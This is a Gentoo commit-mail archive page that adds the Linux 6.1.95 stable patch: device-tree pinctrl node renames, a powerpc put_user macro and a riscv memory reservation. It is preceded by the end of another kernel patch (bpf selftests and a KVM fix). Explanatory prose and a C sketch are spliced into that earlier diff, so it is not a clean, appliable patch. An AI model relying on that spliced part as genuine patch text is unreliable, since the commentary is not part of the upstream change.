+-	fd = bpf_map_get_fd_by_id(map1_id);
+-	if (CHECK(fd >= 0, "map1_leak", "inner_map1 leaked!\n")) {
+-		close(fd);
+-		goto cleanup;
+-	}
+-	fd = bpf_map_get_fd_by_id(map2_id);
+-	if (CHECK(fd >= 0, "map2_leak", "inner_map2 leaked!\n")) {
+-		close(fd);
+-		goto cleanup;
+-	}
+-
+ cleanup:
+ 	test_btf_map_in_map__destroy(skel);
+ }
+diff --git a/tools/testing/selftests/bpf/test_tc_tunnel.sh b/tools/testing/selftests/bpf/test_tc_tunnel.sh
+index 334bdfeab9403..365a2c7a89bad 100755
+--- a/tools/testing/selftests/bpf/test_tc_tunnel.sh
++++ b/tools/testing/selftests/bpf/test_tc_tunnel.sh
+@@ -72,7 +72,6 @@ cleanup() {
+ server_listen() {
+ 	ip netns exec "${ns2}" nc "${netcat_opt}" -l "${port}" > "${outfile}" &
+ 	server_pid=$!
+-	sleep 0.2
+ }
+ 
+ client_connect() {
+@@ -93,6 +92,16 @@ verify_data() {
+ 	fi
+ }
+ 
++wait_for_port() {
++	for i in $(seq 20); do
++		if ip netns exec "${ns2}" ss ${2:--4}OHntl | grep -q "$1"; then
++			return 0
++		fi
++		sleep 0.1
++	done
++	return 1
++}
++
+ set -e
+ 
+ # no arguments: automated test, run all
+@@ -190,6 +199,7 @@ setup
+ # basic communication works
+ echo "test basic connectivity"
+ server_listen
++wait_for_port ${port} ${netcat_opt}
+ client_connect
+ verify_data
+ 
+@@ -201,6 +211,7 @@ ip netns exec "${ns1}" tc filter add dev veth1 egress \
+ 	section "encap_${tuntype}_${mac}"
+ echo "test bpf encap without decap (expect failure)"
+ server_listen
++wait_for_port ${port} ${netcat_opt}
+ ! client_connect
+ 
+ if [[ "$tuntype" =~ "udp" ]]; then
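
wait_for_port() above replaces the old fixed "sleep 0.2" with polling until the listener actually shows up in ss output, removing the startup race outright. The same readiness-polling idea, sketched in C with a connect() retry loop (address, port and retry budget are placeholders):

#include <arpa/inet.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Retry until a TCP listener on ip:port accepts a connection,
 * sleeping 100 ms between attempts, like the shell loop above. */
static int wait_for_port(const char *ip, unsigned short port, int tries)
{
	struct sockaddr_in sa;

	memset(&sa, 0, sizeof(sa));
	sa.sin_family = AF_INET;
	sa.sin_port = htons(port);
	inet_pton(AF_INET, ip, &sa.sin_addr);

	while (tries-- > 0) {
		int fd = socket(AF_INET, SOCK_STREAM, 0);

		if (fd >= 0 && connect(fd, (struct sockaddr *)&sa, sizeof(sa)) == 0) {
			close(fd);
			return 0;
		}
		if (fd >= 0)
			close(fd);
		usleep(100 * 1000);
	}
	return -1;
}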
+diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
+index 8123f4d15930c..7a4fd1dbe0d78 100644
+--- a/virt/kvm/kvm_main.c
++++ b/virt/kvm/kvm_main.c
+@@ -3742,12 +3742,13 @@ void kvm_vcpu_on_spin(struct kvm_vcpu *me, bool yield_to_kernel_mode)
+ {
+ 	struct kvm *kvm = me->kvm;
+ 	struct kvm_vcpu *vcpu;
+-	int last_boosted_vcpu = me->kvm->last_boosted_vcpu;
++	int last_boosted_vcpu;
+ 	unsigned long i;
+ 	int yielded = 0;
+ 	int try = 3;
+ 	int pass;
+ 
++	last_boosted_vcpu = READ_ONCE(kvm->last_boosted_vcpu);
+ 	kvm_vcpu_set_in_spin_loop(me, true);
+ 	/*
+ 	 * We boost the priority of a VCPU that is runnable but not
+@@ -3778,7 +3779,7 @@ void kvm_vcpu_on_spin(struct kvm_vcpu *me, bool yield_to_kernel_mode)
+ 
+ 			yielded = kvm_vcpu_yield_to(vcpu);
+ 			if (yielded > 0) {
+-				kvm->last_boosted_vcpu = i;
++				WRITE_ONCE(kvm->last_boosted_vcpu, i);
+ 				break;
+ 			} else if (yielded < 0) {
+ 				try--;
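
The kvm_main.c hunk above pairs READ_ONCE() with WRITE_ONCE() on last_boosted_vcpu because the field is read and written locklessly from multiple vCPUs; the markings stop the compiler from tearing, refetching or caching the accesses. A minimal user-space sketch of the same pattern (simplified: the real kernel macros also handle non-scalar sizes):

#include <stdio.h>

#define READ_ONCE(x)		(*(volatile __typeof__(x) *)&(x))
#define WRITE_ONCE(x, val)	(*(volatile __typeof__(x) *)&(x) = (val))

static int last_boosted;	/* shared, accessed without a lock */

int main(void)
{
	WRITE_ONCE(last_boosted, 3);		/* one untorn store */
	int snap = READ_ONCE(last_boosted);	/* one untorn load */

	printf("snapshot: %d\n", snap);
	return 0;
}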


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-06-21 14:07 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-06-21 14:07 UTC (permalink / raw
  To: gentoo-commits

commit:     2f30cd686b7b4c4956f6f74e8a4eab1a296bc80a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jun 21 14:07:32 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jun 21 14:07:32 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2f30cd68

Linux patch 6.1.95

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1094_linux-6.1.95.patch | 11396 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11400 insertions(+)

diff --git a/0000_README b/0000_README
index f71731e0..34be8944 100644
--- a/0000_README
+++ b/0000_README
@@ -419,6 +419,10 @@ Patch:  1093_linux-6.1.94.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.94
 
+Patch:  1094_linux-6.1.95.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.95
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1094_linux-6.1.95.patch b/1094_linux-6.1.95.patch
new file mode 100644
index 00000000..3ee0e61a
--- /dev/null
+++ b/1094_linux-6.1.95.patch
@@ -0,0 +1,11396 @@
+diff --git a/Makefile b/Makefile
+index 6c21684b032ee..b760de61167dc 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 94
++SUBLEVEL = 95
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sa8155p-adp.dts b/arch/arm64/boot/dts/qcom/sa8155p-adp.dts
+index 4dee790f1049d..cbec4c9f31025 100644
+--- a/arch/arm64/boot/dts/qcom/sa8155p-adp.dts
++++ b/arch/arm64/boot/dts/qcom/sa8155p-adp.dts
+@@ -372,6 +372,16 @@ rgmii_phy: phy@7 {
+ 	};
+ };
+ 
++&pmm8155au_1_gpios {
++	pmm8155au_1_sdc2_cd: sdc2-cd-default-state {
++		pins = "gpio4";
++		function = "normal";
++		input-enable;
++		bias-pull-up;
++		power-source = <0>;
++	};
++};
++
+ &qupv3_id_1 {
+ 	status = "okay";
+ };
+@@ -389,10 +399,10 @@ &remoteproc_cdsp {
+ &sdhc_2 {
+ 	status = "okay";
+ 
+-	cd-gpios = <&tlmm 4 GPIO_ACTIVE_LOW>;
++	cd-gpios = <&pmm8155au_1_gpios 4 GPIO_ACTIVE_LOW>;
+ 	pinctrl-names = "default", "sleep";
+-	pinctrl-0 = <&sdc2_on>;
+-	pinctrl-1 = <&sdc2_off>;
++	pinctrl-0 = <&sdc2_on &pmm8155au_1_sdc2_cd>;
++	pinctrl-1 = <&sdc2_off &pmm8155au_1_sdc2_cd>;
+ 	vqmmc-supply = <&vreg_l13c_2p96>; /* IO line power */
+ 	vmmc-supply = <&vreg_l17a_2p96>;  /* Card power line */
+ 	bus-width = <4>;
+@@ -488,120 +498,102 @@ &pcie1_phy {
+ &tlmm {
+ 	gpio-reserved-ranges = <0 4>;
+ 
+-	sdc2_on: sdc2_on {
+-		clk {
++	sdc2_on: sdc2-on-state {
++		clk-pins {
+ 			pins = "sdc2_clk";
+ 			bias-disable;		/* No pull */
+ 			drive-strength = <16>;	/* 16 MA */
+ 		};
+ 
+-		cmd {
++		cmd-pins {
+ 			pins = "sdc2_cmd";
+ 			bias-pull-up;		/* pull up */
+ 			drive-strength = <16>;	/* 16 MA */
+ 		};
+ 
+-		data {
++		data-pins {
+ 			pins = "sdc2_data";
+ 			bias-pull-up;		/* pull up */
+ 			drive-strength = <16>;	/* 16 MA */
+ 		};
+-
+-		sd-cd {
+-			pins = "gpio96";
+-			function = "gpio";
+-			bias-pull-up;		/* pull up */
+-			drive-strength = <2>;	/* 2 MA */
+-		};
+ 	};
+ 
+-	sdc2_off: sdc2_off {
+-		clk {
++	sdc2_off: sdc2-off-state {
++		clk-pins {
+ 			pins = "sdc2_clk";
+ 			bias-disable;		/* No pull */
+ 			drive-strength = <2>;	/* 2 MA */
+ 		};
+ 
+-		cmd {
++		cmd-pins {
+ 			pins = "sdc2_cmd";
+ 			bias-pull-up;		/* pull up */
+ 			drive-strength = <2>;	/* 2 MA */
+ 		};
+ 
+-		data {
++		data-pins {
+ 			pins = "sdc2_data";
+ 			bias-pull-up;		/* pull up */
+ 			drive-strength = <2>;	/* 2 MA */
+ 		};
+-
+-		sd-cd {
+-			pins = "gpio96";
+-			function = "gpio";
+-			bias-pull-up;		/* pull up */
+-			drive-strength = <2>;	/* 2 MA */
+-		};
+ 	};
+ 
+-	usb2phy_ac_en1_default: usb2phy_ac_en1_default {
+-		mux {
+-			pins = "gpio113";
+-			function = "usb2phy_ac";
+-			bias-disable;
+-			drive-strength = <2>;
+-		};
++	usb2phy_ac_en1_default: usb2phy-ac-en1-default-state {
++		pins = "gpio113";
++		function = "usb2phy_ac";
++		bias-disable;
++		drive-strength = <2>;
+ 	};
+ 
+-	usb2phy_ac_en2_default: usb2phy_ac_en2_default {
+-		mux {
+-			pins = "gpio123";
+-			function = "usb2phy_ac";
+-			bias-disable;
+-			drive-strength = <2>;
+-		};
++	usb2phy_ac_en2_default: usb2phy-ac-en2-default-state {
++		pins = "gpio123";
++		function = "usb2phy_ac";
++		bias-disable;
++		drive-strength = <2>;
+ 	};
+ 
+-	ethernet_defaults: ethernet-defaults {
+-		mdc {
++	ethernet_defaults: ethernet-defaults-state {
++		mdc-pins {
+ 			pins = "gpio7";
+ 			function = "rgmii";
+ 			bias-pull-up;
+ 		};
+ 
+-		mdio {
++		mdio-pins {
+ 			pins = "gpio59";
+ 			function = "rgmii";
+ 			bias-pull-up;
+ 		};
+ 
+-		rgmii-rx {
++		rgmii-rx-pins {
+ 			pins = "gpio117", "gpio118", "gpio119", "gpio120", "gpio115", "gpio116";
+ 			function = "rgmii";
+ 			bias-disable;
+ 			drive-strength = <2>;
+ 		};
+ 
+-		rgmii-tx {
++		rgmii-tx-pins {
+ 			pins = "gpio122", "gpio4", "gpio5", "gpio6", "gpio114", "gpio121";
+ 			function = "rgmii";
+ 			bias-pull-up;
+ 			drive-strength = <16>;
+ 		};
+ 
+-		phy-intr {
++		phy-intr-pins {
+ 			pins = "gpio124";
+ 			function = "emac_phy";
+ 			bias-disable;
+ 			drive-strength = <8>;
+ 		};
+ 
+-		pps {
++		pps-pins {
+ 			pins = "gpio81";
+ 			function = "emac_pps";
+ 			bias-disable;
+ 			drive-strength = <8>;
+ 		};
+ 
+-		phy-reset {
++		phy-reset-pins {
+ 			pins = "gpio79";
+ 			function = "gpio";
+ 			bias-pull-up;
+diff --git a/arch/arm64/boot/dts/qcom/sm8150-microsoft-surface-duo.dts b/arch/arm64/boot/dts/qcom/sm8150-microsoft-surface-duo.dts
+index bb278ecac3faf..5397fba9417bb 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150-microsoft-surface-duo.dts
++++ b/arch/arm64/boot/dts/qcom/sm8150-microsoft-surface-duo.dts
+@@ -475,7 +475,7 @@ &pon_resin {
+ &tlmm {
+ 	gpio-reserved-ranges = <126 4>;
+ 
+-	da7280_intr_default: da7280-intr-default {
++	da7280_intr_default: da7280-intr-default-state {
+ 		pins = "gpio42";
+ 		function = "gpio";
+ 		bias-pull-up;
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index 9dccecd9fcaef..bbd322fc56460 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -2284,422 +2284,302 @@ tlmm: pinctrl@3100000 {
+ 			#interrupt-cells = <2>;
+ 			wakeup-parent = <&pdc>;
+ 
+-			qup_i2c0_default: qup-i2c0-default {
+-				mux {
+-					pins = "gpio0", "gpio1";
+-					function = "qup0";
+-				};
+-
+-				config {
+-					pins = "gpio0", "gpio1";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c0_default: qup-i2c0-default-state {
++				pins = "gpio0", "gpio1";
++				function = "qup0";
++				drive-strength = <0x02>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi0_default: qup-spi0-default {
++			qup_spi0_default: qup-spi0-default-state {
+ 				pins = "gpio0", "gpio1", "gpio2", "gpio3";
+ 				function = "qup0";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c1_default: qup-i2c1-default {
+-				mux {
+-					pins = "gpio114", "gpio115";
+-					function = "qup1";
+-				};
+-
+-				config {
+-					pins = "gpio114", "gpio115";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c1_default: qup-i2c1-default-state {
++				pins = "gpio114", "gpio115";
++				function = "qup1";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi1_default: qup-spi1-default {
++			qup_spi1_default: qup-spi1-default-state {
+ 				pins = "gpio114", "gpio115", "gpio116", "gpio117";
+ 				function = "qup1";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c2_default: qup-i2c2-default {
+-				mux {
+-					pins = "gpio126", "gpio127";
+-					function = "qup2";
+-				};
+-
+-				config {
+-					pins = "gpio126", "gpio127";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c2_default: qup-i2c2-default-state {
++				pins = "gpio126", "gpio127";
++				function = "qup2";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi2_default: qup-spi2-default {
++			qup_spi2_default: qup-spi2-default-state {
+ 				pins = "gpio126", "gpio127", "gpio128", "gpio129";
+ 				function = "qup2";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c3_default: qup-i2c3-default {
+-				mux {
+-					pins = "gpio144", "gpio145";
+-					function = "qup3";
+-				};
+-
+-				config {
+-					pins = "gpio144", "gpio145";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c3_default: qup-i2c3-default-state {
++				pins = "gpio144", "gpio145";
++				function = "qup3";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi3_default: qup-spi3-default {
++			qup_spi3_default: qup-spi3-default-state {
+ 				pins = "gpio144", "gpio145", "gpio146", "gpio147";
+ 				function = "qup3";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c4_default: qup-i2c4-default {
+-				mux {
+-					pins = "gpio51", "gpio52";
+-					function = "qup4";
+-				};
+-
+-				config {
+-					pins = "gpio51", "gpio52";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c4_default: qup-i2c4-default-state {
++				pins = "gpio51", "gpio52";
++				function = "qup4";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi4_default: qup-spi4-default {
++			qup_spi4_default: qup-spi4-default-state {
+ 				pins = "gpio51", "gpio52", "gpio53", "gpio54";
+ 				function = "qup4";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c5_default: qup-i2c5-default {
+-				mux {
+-					pins = "gpio121", "gpio122";
+-					function = "qup5";
+-				};
+-
+-				config {
+-					pins = "gpio121", "gpio122";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c5_default: qup-i2c5-default-state {
++				pins = "gpio121", "gpio122";
++				function = "qup5";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi5_default: qup-spi5-default {
++			qup_spi5_default: qup-spi5-default-state {
+ 				pins = "gpio119", "gpio120", "gpio121", "gpio122";
+ 				function = "qup5";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c6_default: qup-i2c6-default {
+-				mux {
+-					pins = "gpio6", "gpio7";
+-					function = "qup6";
+-				};
+-
+-				config {
+-					pins = "gpio6", "gpio7";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c6_default: qup-i2c6-default-state {
++				pins = "gpio6", "gpio7";
++				function = "qup6";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi6_default: qup-spi6_default {
++			qup_spi6_default: qup-spi6_default-state {
+ 				pins = "gpio4", "gpio5", "gpio6", "gpio7";
+ 				function = "qup6";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c7_default: qup-i2c7-default {
+-				mux {
+-					pins = "gpio98", "gpio99";
+-					function = "qup7";
+-				};
+-
+-				config {
+-					pins = "gpio98", "gpio99";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c7_default: qup-i2c7-default-state {
++				pins = "gpio98", "gpio99";
++				function = "qup7";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi7_default: qup-spi7_default {
++			qup_spi7_default: qup-spi7_default-state {
+ 				pins = "gpio98", "gpio99", "gpio100", "gpio101";
+ 				function = "qup7";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c8_default: qup-i2c8-default {
+-				mux {
+-					pins = "gpio88", "gpio89";
+-					function = "qup8";
+-				};
+-
+-				config {
+-					pins = "gpio88", "gpio89";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c8_default: qup-i2c8-default-state {
++				pins = "gpio88", "gpio89";
++				function = "qup8";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi8_default: qup-spi8-default {
++			qup_spi8_default: qup-spi8-default-state {
+ 				pins = "gpio88", "gpio89", "gpio90", "gpio91";
+ 				function = "qup8";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c9_default: qup-i2c9-default {
+-				mux {
+-					pins = "gpio39", "gpio40";
+-					function = "qup9";
+-				};
+-
+-				config {
+-					pins = "gpio39", "gpio40";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c9_default: qup-i2c9-default-state {
++				pins = "gpio39", "gpio40";
++				function = "qup9";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi9_default: qup-spi9-default {
++			qup_spi9_default: qup-spi9-default-state {
+ 				pins = "gpio39", "gpio40", "gpio41", "gpio42";
+ 				function = "qup9";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c10_default: qup-i2c10-default {
+-				mux {
+-					pins = "gpio9", "gpio10";
+-					function = "qup10";
+-				};
+-
+-				config {
+-					pins = "gpio9", "gpio10";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c10_default: qup-i2c10-default-state {
++				pins = "gpio9", "gpio10";
++				function = "qup10";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi10_default: qup-spi10-default {
++			qup_spi10_default: qup-spi10-default-state {
+ 				pins = "gpio9", "gpio10", "gpio11", "gpio12";
+ 				function = "qup10";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c11_default: qup-i2c11-default {
+-				mux {
+-					pins = "gpio94", "gpio95";
+-					function = "qup11";
+-				};
+-
+-				config {
+-					pins = "gpio94", "gpio95";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c11_default: qup-i2c11-default-state {
++				pins = "gpio94", "gpio95";
++				function = "qup11";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi11_default: qup-spi11-default {
++			qup_spi11_default: qup-spi11-default-state {
+ 				pins = "gpio92", "gpio93", "gpio94", "gpio95";
+ 				function = "qup11";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c12_default: qup-i2c12-default {
+-				mux {
+-					pins = "gpio83", "gpio84";
+-					function = "qup12";
+-				};
+-
+-				config {
+-					pins = "gpio83", "gpio84";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c12_default: qup-i2c12-default-state {
++				pins = "gpio83", "gpio84";
++				function = "qup12";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi12_default: qup-spi12-default {
++			qup_spi12_default: qup-spi12-default-state {
+ 				pins = "gpio83", "gpio84", "gpio85", "gpio86";
+ 				function = "qup12";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c13_default: qup-i2c13-default {
+-				mux {
+-					pins = "gpio43", "gpio44";
+-					function = "qup13";
+-				};
+-
+-				config {
+-					pins = "gpio43", "gpio44";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c13_default: qup-i2c13-default-state {
++				pins = "gpio43", "gpio44";
++				function = "qup13";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi13_default: qup-spi13-default {
++			qup_spi13_default: qup-spi13-default-state {
+ 				pins = "gpio43", "gpio44", "gpio45", "gpio46";
+ 				function = "qup13";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c14_default: qup-i2c14-default {
+-				mux {
+-					pins = "gpio47", "gpio48";
+-					function = "qup14";
+-				};
+-
+-				config {
+-					pins = "gpio47", "gpio48";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c14_default: qup-i2c14-default-state {
++				pins = "gpio47", "gpio48";
++				function = "qup14";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi14_default: qup-spi14-default {
++			qup_spi14_default: qup-spi14-default-state {
+ 				pins = "gpio47", "gpio48", "gpio49", "gpio50";
+ 				function = "qup14";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c15_default: qup-i2c15-default {
+-				mux {
+-					pins = "gpio27", "gpio28";
+-					function = "qup15";
+-				};
+-
+-				config {
+-					pins = "gpio27", "gpio28";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c15_default: qup-i2c15-default-state {
++				pins = "gpio27", "gpio28";
++				function = "qup15";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi15_default: qup-spi15-default {
++			qup_spi15_default: qup-spi15-default-state {
+ 				pins = "gpio27", "gpio28", "gpio29", "gpio30";
+ 				function = "qup15";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c16_default: qup-i2c16-default {
+-				mux {
+-					pins = "gpio86", "gpio85";
+-					function = "qup16";
+-				};
+-
+-				config {
+-					pins = "gpio86", "gpio85";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c16_default: qup-i2c16-default-state {
++				pins = "gpio86", "gpio85";
++				function = "qup16";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi16_default: qup-spi16-default {
++			qup_spi16_default: qup-spi16-default-state {
+ 				pins = "gpio83", "gpio84", "gpio85", "gpio86";
+ 				function = "qup16";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c17_default: qup-i2c17-default {
+-				mux {
+-					pins = "gpio55", "gpio56";
+-					function = "qup17";
+-				};
+-
+-				config {
+-					pins = "gpio55", "gpio56";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c17_default: qup-i2c17-default-state {
++				pins = "gpio55", "gpio56";
++				function = "qup17";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi17_default: qup-spi17-default {
++			qup_spi17_default: qup-spi17-default-state {
+ 				pins = "gpio55", "gpio56", "gpio57", "gpio58";
+ 				function = "qup17";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c18_default: qup-i2c18-default {
+-				mux {
+-					pins = "gpio23", "gpio24";
+-					function = "qup18";
+-				};
+-
+-				config {
+-					pins = "gpio23", "gpio24";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c18_default: qup-i2c18-default-state {
++				pins = "gpio23", "gpio24";
++				function = "qup18";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi18_default: qup-spi18-default {
++			qup_spi18_default: qup-spi18-default-state {
+ 				pins = "gpio23", "gpio24", "gpio25", "gpio26";
+ 				function = "qup18";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			qup_i2c19_default: qup-i2c19-default {
+-				mux {
+-					pins = "gpio57", "gpio58";
+-					function = "qup19";
+-				};
+-
+-				config {
+-					pins = "gpio57", "gpio58";
+-					drive-strength = <0x02>;
+-					bias-disable;
+-				};
++			qup_i2c19_default: qup-i2c19-default-state {
++				pins = "gpio57", "gpio58";
++				function = "qup19";
++				drive-strength = <2>;
++				bias-disable;
+ 			};
+ 
+-			qup_spi19_default: qup-spi19-default {
++			qup_spi19_default: qup-spi19-default-state {
+ 				pins = "gpio55", "gpio56", "gpio57", "gpio58";
+ 				function = "qup19";
+ 				drive-strength = <6>;
+ 				bias-disable;
+ 			};
+ 
+-			pcie0_default_state: pcie0-default {
+-				perst {
++			pcie0_default_state: pcie0-default-state {
++				perst-pins {
+ 					pins = "gpio35";
+ 					function = "gpio";
+ 					drive-strength = <2>;
+ 					bias-pull-down;
+ 				};
+ 
+-				clkreq {
++				clkreq-pins {
+ 					pins = "gpio36";
+ 					function = "pci_e0";
+ 					drive-strength = <2>;
+ 					bias-pull-up;
+ 				};
+ 
+-				wake {
++				wake-pins {
+ 					pins = "gpio37";
+ 					function = "gpio";
+ 					drive-strength = <2>;
+@@ -2707,22 +2587,22 @@ wake {
+ 				};
+ 			};
+ 
+-			pcie1_default_state: pcie1-default {
+-				perst {
++			pcie1_default_state: pcie1-default-state {
++				perst-pins {
+ 					pins = "gpio102";
+ 					function = "gpio";
+ 					drive-strength = <2>;
+ 					bias-pull-down;
+ 				};
+ 
+-				clkreq {
++				clkreq-pins {
+ 					pins = "gpio103";
+ 					function = "pci_e1";
+ 					drive-strength = <2>;
+ 					bias-pull-up;
+ 				};
+ 
+-				wake {
++				wake-pins {
+ 					pins = "gpio104";
+ 					function = "gpio";
+ 					drive-strength = <2>;
+diff --git a/arch/powerpc/include/asm/uaccess.h b/arch/powerpc/include/asm/uaccess.h
+index 45d4c9cf3f3a2..661046150e49f 100644
+--- a/arch/powerpc/include/asm/uaccess.h
++++ b/arch/powerpc/include/asm/uaccess.h
+@@ -80,9 +80,20 @@ __pu_failed:							\
+ 		:						\
+ 		: label)
+ 
++#ifdef CONFIG_CC_IS_CLANG
++#define DS_FORM_CONSTRAINT "Z<>"
++#else
++#define DS_FORM_CONSTRAINT "YZ<>"
++#endif
++
+ #ifdef __powerpc64__
+-#define __put_user_asm2_goto(x, ptr, label)			\
+-	__put_user_asm_goto(x, ptr, label, "std")
++#define __put_user_asm2_goto(x, addr, label)			\
++	asm goto ("1: std%U1%X1 %0,%1	# put_user\n"		\
++		EX_TABLE(1b, %l2)				\
++		:						\
++		: "r" (x), DS_FORM_CONSTRAINT (*addr)		\
++		:						\
++		: label)
+ #else /* __powerpc64__ */
+ #define __put_user_asm2_goto(x, addr, label)			\
+ 	asm goto(					\
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 7c4852af9e3f1..7ba5c244f3a07 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -213,18 +213,19 @@ static void __init setup_bootmem(void)
+ 	if (!IS_ENABLED(CONFIG_XIP_KERNEL))
+ 		phys_ram_base = memblock_start_of_DRAM();
+ 	/*
+-	 * memblock allocator is not aware of the fact that last 4K bytes of
+-	 * the addressable memory can not be mapped because of IS_ERR_VALUE
+-	 * macro. Make sure that last 4k bytes are not usable by memblock
+-	 * if end of dram is equal to maximum addressable memory.  For 64-bit
+-	 * kernel, this problem can't happen here as the end of the virtual
+-	 * address space is occupied by the kernel mapping then this check must
+-	 * be done as soon as the kernel mapping base address is determined.
++	 * Reserve physical address space that would be mapped to virtual
++	 * addresses greater than (void *)(-PAGE_SIZE) because:
++	 *  - This memory would overlap with ERR_PTR
++	 *  - This memory belongs to high memory, which is not supported
++	 *
++	 * This is not applicable to 64-bit kernel, because virtual addresses
++	 * after (void *)(-PAGE_SIZE) are not linearly mapped: they are
++	 * occupied by kernel mapping. Also it is unrealistic for high memory
++	 * to exist on 64-bit platforms.
+ 	 */
+ 	if (!IS_ENABLED(CONFIG_64BIT)) {
+-		max_mapped_addr = __pa(~(ulong)0);
+-		if (max_mapped_addr == (phys_ram_end - 1))
+-			memblock_set_current_limit(max_mapped_addr - 4096);
++		max_mapped_addr = __va_to_pa_nodebug(-PAGE_SIZE);
++		memblock_reserve(max_mapped_addr, (phys_addr_t)-max_mapped_addr);
+ 	}
+ 
